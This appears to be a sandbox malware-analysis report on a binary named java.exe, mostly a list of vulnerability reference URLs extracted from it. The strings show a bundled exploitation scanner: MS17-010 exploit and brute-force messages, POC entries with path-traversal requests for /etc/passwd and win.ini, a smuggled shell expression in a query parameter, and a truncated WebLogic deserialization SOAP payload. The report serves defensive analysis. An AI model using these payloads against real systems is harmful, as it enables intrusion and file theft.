Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPwname:
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/3bI7v-hv4rMUnCIT0GLkJA
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/3t7r7FCirDEAsXcf2QMomw
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/6phWjDrGG0pCpGuCdLusIg
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/9mpvppx3F-nTQYoPdY2r3w
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/9mpvppx3F-nTQYoPdY2r3wname:
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/F-M21PT0xn9QOuwoC8llKAname:
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/Fl2hSO-y60VsTi5YJFyl0w
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/HFug1khyfHmCujhc_Gm_yQ
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQname:
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/ZwhBEz2ek26Zf3F-csoRgQ
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/jgNyTHSqWA5twyk5tfSQUQ
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/qIAcycsO_L9JKisG5Bgg_w
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/sulJSg0Ru138oASiI5cYAA
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/taEEl6UQ2yi4cqzs2UBfCg
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93gname:
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s?__biz=MzAxODg1MDMwOQ==&mid=2247489109&idx=1&sn=0c9a3388e4ac1389897b4449fb
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d9
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c7
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247488978&idx=1&sn=c0a5369f2b374dcef0bbf61b92
Source: java.exeString found in binary or memory: https://mrxn.net/Infiltration/323.html
Source: java.exeString found in binary or memory: https://my.oschina.net/u/4581879/blog/4753320name:
Source: java.exeString found in binary or memory: https://news.ssssafe.com/archives/3325
Source: java.exeString found in binary or memory: https://nifi.apache.org/docs/nifi-docs/rest-api/index.html
Source: java.exeString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2018-17246
Source: java.exeString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2019-16312name:
Source: java.exeString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2019-8442
Source: java.exeString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2020-27986
Source: java.exeString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2020-3452
Source: java.exeString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2020-35736
Source: java.exeString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2020-7980
Source: java.exeString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2020-8209
Source: java.exeString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2021-41773
Source: java.exeString found in binary or memory: https://nvd.nist.gov/vuln/detail/CVE-2022-26134
Source: java.exeString found in binary or memory: https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html
Source: java.exeString found in binary or memory: https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.h
Source: java.exeString found in binary or memory: https://paper.seebug.org/1485/name:
Source: java.exeString found in binary or memory: https://paper.seebug.org/1489
Source: java.exeString found in binary or memory: https://paper.seebug.org/567/
Source: java.exeString found in binary or memory: https://paper.seebug.org/676/name:
Source: java.exeString found in binary or memory: https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
Source: java.exeString found in binary or memory: https://phyb0x.github.io/2018/10/09/seacms%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90/nam
Source: java.exeString found in binary or memory: https://pivotal.io/security/cve-2020-5405
Source: java.exeString found in binary or memory: https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=4210
Source: java.exeString found in binary or memory: https://print1n.top)
Source: java.exeString found in binary or memory: https://print1n.top/post/Other/TamronOS_IPTV%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E5%89%8D%E5%8F%B0%E
Source: java.exeString found in binary or memory: https://quake.360.cn/quake/#/vulDetail/QH-202006-1954/checked
Source: java.exeString found in binary or memory: https://s.tencent.com/research/bsafe/1156.html
Source: java.exeString found in binary or memory: https://s.tencent.com/research/bsafe/1228.html
Source: java.exeString found in binary or memory: https://s.tencent.com/research/bsafe/474.htmlname:
Source: java.exeString found in binary or memory: https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%
Source: java.exeString found in binary or memory: https://seclists.org/oss-sec/2021/q3/188
Source: java.exeString found in binary or memory: https://securityaffairs.co/wordpress/91689/hacking/unpatched-critical-0-day-vbulletin.html
Source: java.exeString found in binary or memory: https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
Source: java.exeString found in binary or memory: https://share.zabbix.com/
Source: java.exeString found in binary or memory: https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
Source: java.exeString found in binary or memory: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2
Source: java.exeString found in binary or memory: https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/
Source: java.exeString found in binary or memory: https://support.citrix.com/article/CTX276688
Source: java.exeString found in binary or memory: https://support.f5.com/csp/article/K03009991
Source: java.exeString found in binary or memory: https://support.f5.com/csp/article/K23605346
Source: java.exeString found in binary or memory: https://support.f5.com/csp/article/K52145254
Source: java.exeString found in binary or memory: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-
Source: java.exeString found in binary or memory: https://suzzz112113.github.io/#blog)
Source: java.exeString found in binary or memory: https://swarm.ptsecurity.com/unauth-rce-vmware/name:
Source: java.exeString found in binary or memory: https://t.co/LfvbyBUhF5
Source: java.exeString found in binary or memory: https://tom0li.github.io/)
Source: java.exeString found in binary or memory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB
Source: java.exeString found in binary or memory: https://twitter.com/ptswarm/status/1318914772918767619
Source: java.exeString found in binary or memory: https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-fr
Source: java.exeString found in binary or memory: https://vulhub.org/#/environments/jupyter/notebook-rce/
Source: java.exeString found in binary or memory: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
Source: java.exeString found in binary or memory: https://we1x4n.com/)
Source: java.exeString found in binary or memory: https://we1x4n.github.io/)
Source: java.exeString found in binary or memory: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
Source: java.exeString found in binary or memory: https://www.anquanke.com/post/id/168991name:
Source: java.exeString found in binary or memory: https://www.anquanke.com/post/id/183241
Source: java.exeString found in binary or memory: https://www.anquanke.com/post/id/187923
Source: java.exeString found in binary or memory: https://www.anquanke.com/post/id/232748
Source: java.exeString found in binary or memory: https://www.anquanke.com/post/id/239865
Source: java.exeString found in binary or memory: https://www.anquanke.com/post/id/243098
Source: java.exeString found in binary or memory: https://www.anquanke.com/vul/id/1150798name:
Source: java.exeString found in binary or memory: https://www.anquanke.com/vul/id/1674598
Source: java.exeString found in binary or memory: https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
Source: java.exeString found in binary or memory: https://www.cnblogs.com/-mo-/p/11295400.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/-qing-/p/10889467.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/0day-li/p/13650452.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/0daybug/p/12786036.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/17bdw/p/11840588.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/EasonJim/p/6859345.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/Spec/p/10718046.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/T0uch/p/14475551.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/ffx1/p/12653597.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/jinqi520/p/10202615.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/jinqi520/p/11596500.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/magic-zero/p/12641068.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/milantgh/p/3615986.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/potatsoSec/p/13437713.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/rebeyond/p/4951418.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/sallyzhang/p/12457031.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/test404/p/7397755.htmlname:
Source: java.exeString found in binary or memory: https://www.cnblogs.com/wishwzp/p/9438658.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/wyb628/p/8567610.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/xiexiandong/p/12888582.html
Source: java.exeString found in binary or memory: https://www.cnblogs.com/yuzly/p/11255609.html
Source: java.exeString found in binary or memory: https://www.cnvd.org.cn/flaw/show/2025171
Source: java.exeString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205
Source: java.exeString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603name:
Source: java.exeString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
Source: java.exeString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239
Source: java.exeString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2020-57264
Source: java.exeString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422
Source: java.exeString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2020-67113
Source: java.exeString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2021-04128name:
Source: java.exeString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2021-34568
Source: java.exeString found in binary or memory: https://www.cnvd.org.cn/flaw/show/CNVD-2021-39012name:
Source: java.exeString found in binary or memory: https://www.cnvd.org.cn/patchInfo/show/192993
Source: java.exeString found in binary or memory: https://www.du1x3r12.com
Source: java.exeString found in binary or memory: https://www.exploit-db.com/exploits/38797
Source: java.exeString found in binary or memory: https://www.exploit-db.com/exploits/40211name:
Source: java.exeString found in binary or memory: https://www.exploit-db.com/exploits/43974
Source: java.exeString found in binary or memory: https://www.exploit-db.com/exploits/44160
Source: java.exeString found in binary or memory: https://www.exploit-db.com/exploits/44495/
Source: java.exeString found in binary or memory: https://www.exploit-db.com/exploits/46073
Source: java.exeString found in binary or memory: https://www.exploit-db.com/exploits/46074
Source: java.exeString found in binary or memory: https://www.exploit-db.com/exploits/46227
Source: java.exeString found in binary or memory: https://www.exploit-db.com/exploits/47465
Source: java.exeString found in binary or memory: https://www.exploit-db.com/exploits/47467name:
Source: java.exeString found in binary or memory: https://www.exploit-db.com/exploits/47774
Source: java.exeString found in binary or memory: https://www.exploit-db.com/exploits/48698
Source: java.exeString found in binary or memory: https://www.freebuf.com/column/214946.htmlname:
Source: java.exeString found in binary or memory: https://www.freebuf.com/news/196993.html
Source: java.exeString found in binary or memory: https://www.freebuf.com/vuls/152058.html
Source: java.exeString found in binary or memory: https://www.freebuf.com/vuls/152058.htmlname:
Source: java.exeString found in binary or memory: https://www.freebuf.com/vuls/155753.html
Source: java.exeString found in binary or memory: https://www.freebuf.com/vuls/181814.html
Source: java.exeString found in binary or memory: https://www.freebuf.com/vuls/214767.htmlname:
Source: java.exeString found in binary or memory: https://www.freebuf.com/vuls/217586.html
Source: java.exeString found in binary or memory: https://www.hackbug.net/archives/111.html
Source: java.exeString found in binary or memory: https://www.hacking8.com/bug-web/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-GRP-u8%E6%B3%A8%E5%85%A5%E6%B
Source: java.exeString found in binary or memory: https://www.hedysx.com/2777.html
Source: java.exeString found in binary or memory: https://www.jianshu.com/p/8d878330a42f
Source: java.exeString found in binary or memory: https://www.kingkk.com/)
Source: java.exeString found in binary or memory: https://www.ld-fcw.com/
Source: java.exeString found in binary or memory: https://www.linuxlz.com/aqld/2309.html
Source: java.exeString found in binary or memory: https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371name:
Source: java.exeString found in binary or memory: https://www.ohlinge.cn)
Source: java.exeString found in binary or memory: https://www.onebug.org/wooyundata/65458.html
Source: java.exeString found in binary or memory: https://www.oracle.com/security-alerts/alert-cve-2020-14750.html
Source: java.exeString found in binary or memory: https://www.pwnwiki.org/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_get_detail_view.php_%
Source: java.exeString found in binary or memory: https://www.ruijie.com.cn/gy/xw-aqtg-gw/86747/
Source: java.exeString found in binary or memory: https://www.runoob.com/mongodb/working-with-rockmongo.htmlname:
Source: java.exeString found in binary or memory: https://www.secpulse.com/archives/107611.htmlname:
Source: java.exeString found in binary or memory: https://www.secpulse.com/archives/39144.html
Source: java.exeString found in binary or memory: https://www.secpulse.com/archives/47690.html
Source: java.exeString found in binary or memory: https://www.secpulse.com/archives/496.htmlname:
Source: java.exeString found in binary or memory: https://www.secquan.org/Prime/1069179name:
Source: java.exeString found in binary or memory: https://www.seebug.org/vuldb/ssvid-91597name:
Source: java.exeString found in binary or memory: https://www.seebug.org/vuldb/ssvid-91762
Source: java.exeString found in binary or memory: https://www.seebug.org/vuldb/ssvid-96562
Source: java.exeString found in binary or memory: https://www.seebug.org/vuldb/ssvid-97265
Source: java.exeString found in binary or memory: https://www.seebug.org/vuldb/ssvid-97266
Source: java.exeString found in binary or memory: https://www.seebug.org/vuldb/ssvid-97267
Source: java.exeString found in binary or memory: https://www.seebug.org/vuldb/ssvid-97268
Source: java.exeString found in binary or memory: https://www.seebug.org/vuldb/ssvid-98364
Source: java.exeString found in binary or memory: https://www.seebug.org/vuldb/ssvid-99075
Source: java.exeString found in binary or memory: https://www.t00ls.net/articles-54436.html
Source: java.exeString found in binary or memory: https://www.t00ls.net/thread-53291-1-1.html
Source: java.exeString found in binary or memory: https://www.tenable.com/cve/CVE-2020-14181
Source: java.exeString found in binary or memory: https://www.tensorflow.org/guide/summaries_and_tensorboard?hl=zh-CN
Source: java.exeString found in binary or memory: https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-kno
Source: java.exeString found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Resul
Source: java.exeString found in binary or memory: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabili
Source: java.exeString found in binary or memory: https://www.twilio.com/blog/2017/08/http-requests-in-node-js.htmlname:
Source: java.exeString found in binary or memory: https://www.uedbox.com/post/29340
Source: java.exeString found in binary or memory: https://www.uedbox.com/post/30019/
Source: java.exeString found in binary or memory: https://www.uedbox.com/post/35188/
Source: java.exeString found in binary or memory: https://www.uedbox.com/post/54561/
Source: java.exeString found in binary or memory: https://www.viddler.com/v/test
Source: java.exeString found in binary or memory: https://www.vmware.com/security/advisories/VMSA-2021-0004.html
Source: java.exeString found in binary or memory: https://www.weaver.com.cn/
Source: java.exeString found in binary or memory: https://www.weaver.com.cn/cs/securityDownload.asp
Source: java.exeString found in binary or memory: https://www.weaver.com.cn/cs/securityDownload.aspname:
Source: java.exeString found in binary or memory: https://www.zabbix.com/documentation/3.4/zh/manual/quickstart/login
Source: java.exeString found in binary or memory: https://www.zhihuifly.com/t/topic/3118
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/2224
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/2490
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/2828name:
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/2941
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/5299
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/6103name:
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/6419
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/6453
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/6635name:
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/6708
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/7219
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/7877name:
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/8478#reply-15684
Source: java.exeString found in binary or memory: https://xz.aliyun.com/t/9016?page=1
Source: java.exeString found in binary or memory: https://y4er.com/post/metinfo7-sql-tips/#sql-injection-1name:
Source: java.exeString found in binary or memory: https://y4er.com/post/metinfo7-sql-tips/#sql-injection-2name:
Source: java.exeString found in binary or memory: https://yq.aliyun.com/articles/616757
Source: java.exeString found in binary or memory: https://yun.scdsjzx.cn/system/notice/detail/399d2dd0-94aa-4914-a8f6-e71f8dc8ac87
Source: java.exeString found in binary or memory: https://zhuanlan.zhihu.com/p/61215662Indicates
Source: java.exeString found in binary or memory: https://zhuanlan.zhihu.com/p/85265552
Source: java.exeStatic PE information: Number of sections : 15 > 10
Source: java.exeStatic PE information: Section: /19 ZLIB complexity 0.9995200015515101
Source: java.exeStatic PE information: Section: /32 ZLIB complexity 0.990380462398374
Source: java.exeStatic PE information: Section: /78 ZLIB complexity 0.9902628242048157
Source: classification engineClassification label: sus22.expl.winEXE@2/1@0/0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Users\user\Desktop\java.exeFile opened: C:\Windows\system32\08315936ed9e595185360809e6f5c1ff4d152caa91fc9832ac6bf5b152534d96AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
Source: java.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\java.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: java.exeString found in binary or memory: url: %sNetDDE ServiceMaster BrowserUnable to readbad connection: extra text: invalid syntax1907348632812595367431640625unexpected EOFComputerNameExunsafe.Pointer on zero Valueunknown methoddocument startsequence startinternal error.in-addr.arpa.getprotobynameunknown mode: 20060102150405%s %s %s 00:00Not logged in.
Source: java.exeString found in binary or memory: invalid nil Durationduplicate map key %v%s: invalid %v valueinvalid field number,hasSemanticContext=DFA after MatchATN: start state closure=predictATN decision ctx sensitive state fieldInitializerListinvalid map key typereflect.Value.Complex MS17-010 exp failed MS17-010exploit end[+] mssql %v:%v:%v %v[+] mysql %v:%v:%v %v[x224 connect err] %v[-] redis %v:%v %v %v[+] SMB2 %v:%v:%v\%v [+] WmiExec %v:%v:%v Network Monitor AgentDomain Master Browserno support this proxyhttp://127.0.0.1:8080 start scan the port:host file, -hf ip.txtnot to Brute passwordMorocco Standard TimeNamibia Standard TimeAlaskan Standard TimeCentral Standard TimePacific Standard TimeEastern Standard TimeSE Asia Standard TimeArabian Standard TimeMagadan Standard TimeMyanmar Standard TimeYakutsk Standard TimeBelarus Standard TimeRussian Standard TimeRomance Standard TimeSaratov Standard TimeNorfolk Standard Timeunsupported operation186264514923095703125931322574615478515625bad type in compare: unknown ABI part kind of unexported methodunexpected value stepreflect.Value.SetZeroreflect.Value.Pointerreflect.Value.SetUintinvalid emitter stateexpected STREAM-STARTexpected DOCUMENT-ENDcannot marshal type: write handler not setlocalhost.localdomainbufio: negative countunsupported LIST lineunsupported LIST dateCommand unrecognized.exec: already startednegative shift amountconcurrent map writes/gc/heap/allocs:bytesruntime: work.nwait= previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptionCOMMIT TRANSACTION %xcaching_sha2_passwordmysql_native_passwordunknown field type %dutf8mb4_lithuanian_ciutf8mb4_vietnamese_ciData Type NegotiationAUTH_SC_INSTANCE_NAMEAUTH_SC_DBUNIQUE_NAMEAUTH_NLS_LXCTERRITORYPrepare With Context
Source: java.exeString found in binary or memory: )The device has succeeded a query-stop and its resource requirements have changed.The transactional resource manager is already consistent. Recovery is not needed.{EXCEPTION} Single Step A single step or trace operation has just been completed.Indicates a particular security ID may not be assigned as the owner of an object.Indicates the Sam Server was in the wrong state to perform the desired operation.An invalid parameter was passed to a service or function as the seventh argument.An invalid parameter was passed to a service or function as the twelfth argument.A requested file lock operation cannot be processed due to an invalid byte range.An attempt was made to create more links on a file than the file system supports.In a mixed domain, no nesting of a global group if the group is security enabled.The master file table on the volume is too fragmented to complete this operation.Indicates a particular Security ID may not be assigned as the label of an object.Status 0x%08x was returned, waiting on handle 0x%x for wait 0x%p, in waiter 0x%p.Hash generation for the specified version and hash type is not enabled on server.The application isolation metadata for this process or thread has become corrupt.The log service encountered an attempt to read the log with an invalid read mode.The log service encountered an error when attempting to write to a log container.A GPU exception was detected on the given device. The device cannot be scheduled.The miniport has no recommendation for augmenting the specified VidPN's topology.The chain of linked adapters is not ready to start because of an unknown failure.The function failed because the caller passed in an invalid OPM user-mode handle.The function failed because an unexpected error occurred inside a display driver.ALTER SESSION SET NLS_LANGUAGE='AMERICAN' NLS_TERRITORY='AMERICA' TIME_ZONE='%s'
Source: java.exeString found in binary or memory: )The device has succeeded a query-stop and its resource requirements have changed.The transactional resource manager is already consistent. Recovery is not needed.{EXCEPTION} Single Step A single step or trace operation has just been completed.Indicates a particular security ID may not be assigned as the owner of an object.Indicates the Sam Server was in the wrong state to perform the desired operation.An invalid parameter was passed to a service or function as the seventh argument.An invalid parameter was passed to a service or function as the twelfth argument.A requested file lock operation cannot be processed due to an invalid byte range.An attempt was made to create more links on a file than the file system supports.In a mixed domain, no nesting of a global group if the group is security enabled.The master file table on the volume is too fragmented to complete this operation.Indicates a particular Security ID may not be assigned as the label of an object.Status 0x%08x was returned, waiting on handle 0x%x for wait 0x%p, in waiter 0x%p.Hash generation for the specified version and hash type is not enabled on server.The application isolation metadata for this process or thread has become corrupt.The log service encountered an attempt to read the log with an invalid read mode.The log service encountered an error when attempting to write to a log container.A GPU exception was detected on the given device. The device cannot be scheduled.The miniport has no recommendation for augmenting the specified VidPN's topology.The chain of linked adapters is not ready to start because of an unknown failure.The function failed because the caller passed in an invalid OPM user-mode handle.The function failed because an unexpected error occurred inside a display driver.ALTER SESSION SET NLS_LANGUAGE='AMERICAN' NLS_TERRITORY='AMERICA' TIME_ZONE='%s'Response shorter than expected... possible error in command? Expected > 1145, got x509: a root or intermediate certificate is not authorized to sign for this name: The kernel driver detected a version mismatch between it and the user mode driver.Starting the lead adapter in a linked configuration has been temporarily deferred.{Wrong Volume} The wrong volume is in the drive. Insert volume %hs into drive %hs.An invalid parameter was passed to a service or function as the eleventh argument.The directory service detected an attempt to modify the object class of an object.An unsupported pre-authentication mechanism was presented to the Kerberos package.An Internet Control Message Protocol (ICMP) hop limit exceeded error was received.The hash requests is not present or not up to date with the current file contents.Carrier detection has failed or the carrier has been dropped due to disconnection.The log service has attempted to read or write backward past the start of the log.The log service encountered an error when attempting to read from a log container.The specified frequency range is not in the specified monitor frequenc
Source: java.exeString found in binary or memory: name: poc-yaml-xiuno-bbs-cvnd-2019-01348-reinstallation
Source: java.exeString found in binary or memory: path: /install/
Source: java.exeString found in binary or memory: - https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager
Source: java.exeString found in binary or memory: - https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager
Source: java.exeString found in binary or memory: path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20{{r}}%20%2B%20{{r1}}%20%20%23
Source: java.exeString found in binary or memory: path: /addons/phpmailer/phpmailer.php
Source: java.exeString found in binary or memory: path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../etc/passwd
Source: java.exeString found in binary or memory: path: /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../windows/win.ini
Source: java.exeString found in binary or memory: path: /install.php?finish
Source: java.exeString found in binary or memory: path: /ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages
Source: java.exeString found in binary or memory: path: /api/project/add
Source: java.exeString found in binary or memory: path: /api/interface/add
Source: java.exeString found in binary or memory: xmlns:wsa="http://www.w3.org/2005/08/addressing"
Source: java.exeString found in binary or memory: <?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>fff</wsa:Action><wsa:RelatesTo>hello</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><string><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"/><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="write"><array class="byte" length="9"><void index="0"><byte>50</byte></void><void index="1"><byte>50</byte></void><void index="2"><byte>53</byte></void><void index="3"><byte>55</byte></void><void index="4"><byte>55</byte></void><void index="5"><byte>51</byte></void><void index="6"><byte>48</byte></void><void index="7"><byte>57</byte></void><void index="8"><byte>49</byte></void></array></void><void method="flush"/></void><void method="getWriter"><void 